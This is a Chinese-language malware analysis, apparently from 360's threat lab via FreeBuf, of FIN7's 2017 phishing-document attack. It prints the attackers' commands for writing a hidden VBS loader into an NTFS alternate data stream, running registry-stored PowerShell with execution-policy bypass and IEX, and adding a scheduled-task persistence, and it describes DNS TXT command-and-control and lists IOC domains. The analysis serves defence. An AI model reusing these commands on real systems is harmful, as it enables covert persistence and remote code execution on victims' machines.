信息來(lái)源：FreeBuf

事件背景

2017年3月，F(xiàn)ireEye發(fā)布了一篇名黑客組織FIN7的APT攻擊簡(jiǎn)報(bào)，報(bào)告稱FIN7組織以釣魚郵件為攻擊渠道，主要對(duì)美國(guó)金融機(jī)構(gòu)滲透攻擊。組織的攻擊利用DNS協(xié)議的TXT字段進(jìn)行C&C通信。360威脅情報(bào)中心對(duì)此APT組織的攻擊鏈條進(jìn)行了梳理，對(duì)木馬相關(guān)的技術(shù)進(jìn)行了分析，揭示其一些有意思的技巧。

目標(biāo)樣本

Hash	d04b6410dddee19adec75f597c52e386
文件類型	Word文檔
文件大小	1,834,496字節(jié)

攻擊特點(diǎn)與攻擊流程

FIN7攻擊特點(diǎn)主要體現(xiàn)在：

1. 全部攻擊過(guò)程使用非PE實(shí)現(xiàn)，釣魚使用doc文件，后門使用powershell文件。

2. 使用ADS數(shù)據(jù)隱藏保存在磁盤中的非PE文件

3. 后門文件保存在注冊(cè)表中，功能由Powershell實(shí)現(xiàn)

4. 與C&C通信使用DNS協(xié)議的TXT記錄

5. C&C地址從64個(gè)硬編碼的地址中隨機(jī)選擇

攻擊流程：

在整個(gè)攻擊過(guò)程中，沒(méi)有使用到PE文件，這在一定程度上躲避了安全軟件的查殺。落地的文件也進(jìn)行了技術(shù)上的隱藏，而真正的后門程序卻已加密的方式存儲(chǔ)在注冊(cè)表中。

攻擊者以釣魚郵件為進(jìn)入渠道，在惡意文檔中嵌入vbs腳本，vbs腳本運(yùn)行后解密后門程序?qū)懭胱?cè)表中，同時(shí)將調(diào)用后門程序的腳本以ads隱藏在磁盤文件中。在后門運(yùn)行后，使用DNS TXT做為C&C通信方式。

樣本分析

釣魚郵件打開后，顯示如下圖所示，可以看到，文檔中插入了一張圖片，圖片字體顯示模糊。

 

通過(guò)分析，得到了釣魚文檔的制作過(guò)程：分別插入了一個(gè)vbs的OLE對(duì)象與一張字跡模糊的圖片，將OLE對(duì)象的圖標(biāo)設(shè)置為透明圖標(biāo)并置入圖片對(duì)象的頂層，最將兩個(gè)對(duì)象組合到一起，這樣就達(dá)到了雙擊圖片，實(shí)際上運(yùn)行了vbs腳本的目的。 

雙擊圖片，就會(huì)打開vbs腳本，只有當(dāng)用戶點(diǎn)擊彈出的對(duì)話框中的確定后，才會(huì)運(yùn)行vbs腳本，如果在這時(shí)，用戶點(diǎn)擊了取消，就可以阻斷這次攻擊。

為了誘導(dǎo)用戶雙擊圖片運(yùn)行vbs腳本，文檔中還寫入“This document is protected by Microsoft Office and requires human verification Please Enable Editing and Double Click on page below.”（文檔被Microsoft Office 保護(hù)，請(qǐng)啟用編輯并雙擊下面的圖片）。

VBS功能：

當(dāng)上面的圖片被雙擊運(yùn)行后，程序后臺(tái)會(huì)運(yùn)行VBS腳本，該腳本功能為：調(diào)用powershell解密一大段字符，從代碼中可以看出，解密出來(lái)的為一gz文件，因此可以將這大段base64解密后，保存成gz格式，使用解壓工具得到壓縮文件繼續(xù)分析。

樣本加載感染過(guò)程：

gz中的文件也是一個(gè)powershell腳本。腳本經(jīng)過(guò)混淆，實(shí)現(xiàn)的功能是：判斷當(dāng)前用戶是不是administartor權(quán)限，根據(jù)不同的權(quán)限寫入不同的注冊(cè)表內(nèi)容，這些內(nèi)容為開機(jī)后會(huì)解密執(zhí)行的代碼，隨后通過(guò)ADS將加載注冊(cè)表內(nèi)容的vbs腳本寫入C:\ProgramData\windows :CtxDnsClient.vbs文件中，并將該文件加入啟動(dòng)項(xiàng)和計(jì)劃任務(wù)中。

 原始的powershell內(nèi)容，可以看到powershell腳本經(jīng)過(guò)了混淆：

后門程序?qū)懭胱?cè)表

Powershell寫入到注冊(cè)表中的后門程序的內(nèi)容如下：

ADS隱藏磁盤文件

將要實(shí)現(xiàn)開機(jī)啟動(dòng)的文件寫入到磁盤文件C:\ProgramData\Windows:CtxDnsClient.vbs中。

對(duì)于Windows:CtxDnsClient.vbs文件，使用了ADS數(shù)據(jù)隱藏技術(shù)。而通過(guò)ADS隱藏的數(shù)據(jù)在Windows系統(tǒng)中無(wú)法顯示，文件大小也顯示為0字節(jié)：

 

但是使用dir /r命令，可以看到ADS中有隱藏的數(shù)據(jù)

 

啟動(dòng)項(xiàng)中的隱藏的ads數(shù)據(jù)，dump出來(lái)后顯示如下：

 

使用 ADS中隱藏?cái)?shù)據(jù)內(nèi)容為：

cmd /c "echo Set objShell = CreateObject(""Wscript.shell"") > C:\ProgramData\Windows:CtxDnsClient.vbs" 

cmd /c "echo objShell.run ""powershell -WindowStyle Hidden -executionpolicy bypass 

-C IEX ((Get-ItemProperty -Path HKCU:Software\Microsoft\Windows).Part)"",0 >> C:\ProgramData\Windows:CtxDnsClient.vbs"

添加開機(jī)啟動(dòng)

創(chuàng)建的啟動(dòng)項(xiàng)，啟動(dòng)項(xiàng)位置為HKCU\Software\Microsoft\Windows\CurrentVersion\Run\：

添加計(jì)劃任務(wù)：

schtasks.exe /F /create /tn CtxDnsClient /tr 

"C:\Windows\System32\wscript.exe C:\ProgramData\Windows:CtxDnsClient.vbs " /sc onidle /i 30

通過(guò)上面這些過(guò)程，來(lái)實(shí)現(xiàn)程序的自啟動(dòng)。在系統(tǒng)重新啟動(dòng)后，啟動(dòng)項(xiàng)中的wscript.exe會(huì)加載Windows:CtxDnsClient.vbs，Windows:CtxDnsClient.vbs中會(huì)使用powershell加載HKCU\Software\Microsoft\Windows \Part內(nèi)容，part中實(shí)現(xiàn)的功能會(huì)加載注冊(cè)表相同位置下的CtxDnsClient的內(nèi)容。這里的內(nèi)容就是真正的實(shí)現(xiàn)CC的功能。

C&C通信功能

這部分功能主要在注冊(cè)表中的HKCU\Software\Microsoft\Windows下 CtxDnsClient的內(nèi)容中，主要功能為：從內(nèi)置的64個(gè)域名中隨機(jī)選擇一個(gè)，查詢?cè)撚蛎腟PF記錄，用來(lái)實(shí)現(xiàn)自己的C&C通信。

創(chuàng)建名為”SourceFireSux”的互斥體，防止程序重復(fù)運(yùn)行：

編碼過(guò)的64個(gè)域名地址代碼片段：

 

 

從這64個(gè)域名中，隨機(jī)選取一個(gè)（如這里隨機(jī)被選擇到的為：pbbk.us），加上www前綴，查詢對(duì)應(yīng)DNS TXT記錄內(nèi)容（即查詢www.pbbk.us的dns txt記錄）。

如果返回的內(nèi)容為idle，則程序睡眠3.5秒到5.4秒的隨機(jī)時(shí)間。

如果返回的內(nèi)容為www，則表明這個(gè)域名現(xiàn)在正在攻擊者控制之中，隨后查詢mail.pbbk.us的dns txt記錄。

隨后mail.pbbk.us返回的內(nèi)容就被 powershell直接通過(guò)IEX調(diào)用執(zhí)行。

IOC

木馬嘗試通信的C&C地址：

域名	注冊(cè)人	注冊(cè)時(shí)間	備注
www.grij.us	Frank Walters	2017/2/19 3:09
www.kwoe.us	Frank Walters	2017/2/19 3:09
www.zugh.us	Frank Walters	2017/2/19 3:09
www.pafk.us	Frank Walters	2017/2/19 3:09
www.cuuo.us	Frank Walters	2017/2/19 3:07
www.ooyh.us	Frank Walters	2017/2/19 3:07
www.vxqt.us	Frank Walters	2017/2/19 3:06
www.cgqy.us	Frank Walters	2017/2/19 3:07
www.wfsv.us	Frank Walters	2017/2/19 3:07
www.palj.us	Frank Walters	2017/2/19 3:09
www.idjb.us	Frank Walters	2017/2/19 3:09
www.zjav.us	Frank Walters	2017/2/19 3:09
www.mewt.us	Frank Walters	2017/2/19 3:06
www.vkpo.us	Frank Walters	2017/2/19 3:07
www.wqiy.info	WhoisGuard Protected	2017/2/18 19:08
www.wvzu.pw	WhoisGuard Protected	2017/2/18 0:00
www.gxhp.top	WhoisGuard Protected	2017/2/18 19:07
www.hvzr.info	WhoisGuard Protected	2017/2/18 19:07
www.reld.info	WhoisGuard Protected	2017/2/18 0:00
www.vqba.info	WhoisGuard Protected	2017/2/18 19:06
www.oxrp.info	WhoisGuard Protected	2017/2/18 19:08
www.dvso.pw	WhoisGuard Protected	2017/2/18 0:00
www.bvyv.club
www.bwuk.club
www.cihr.site
www.coec.club
www.oyaw.club
www.pbbk.us
www.ppdx.pw
www.pvze.club
www.qefg.info
www.qlpa.club
www.ueox.club
www.ufyb.club
www.dbxa.pw
www.eady.club
www.enuv.club
www.eter.pw
www.utca.site
www.vdfe.site
www.vjro.club
www.fbjz.pw
www.fhyi.club
www.futh.pw
www.gnoa.pw
www.vwcq.us
www.jimw.club
www.jomp.site
www.jxhv.site
www.kshv.site
www.ysxy.pw
www.zmyo.club
www.zody.pw
www.lhlv.club
www.lnoy.site
www.lvrm.pw
www.mfka.pw
www.nxpu.site
www.oaax.site
www.odyr.us
www.oknz.club
www.ooep.pw
www.ckwl.pw	Lin Shi Mo Ban	2015/11/11 0:00	不能作為IOC
www.zcnt.pw	Lin Shi Mo Ban	2015/11/16 0:00	不能作為IOC

參考鏈接

https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

*本文作者：360天眼實(shí)驗(yàn)室，轉(zhuǎn)載請(qǐng)注明來(lái)自FreeBuf.COM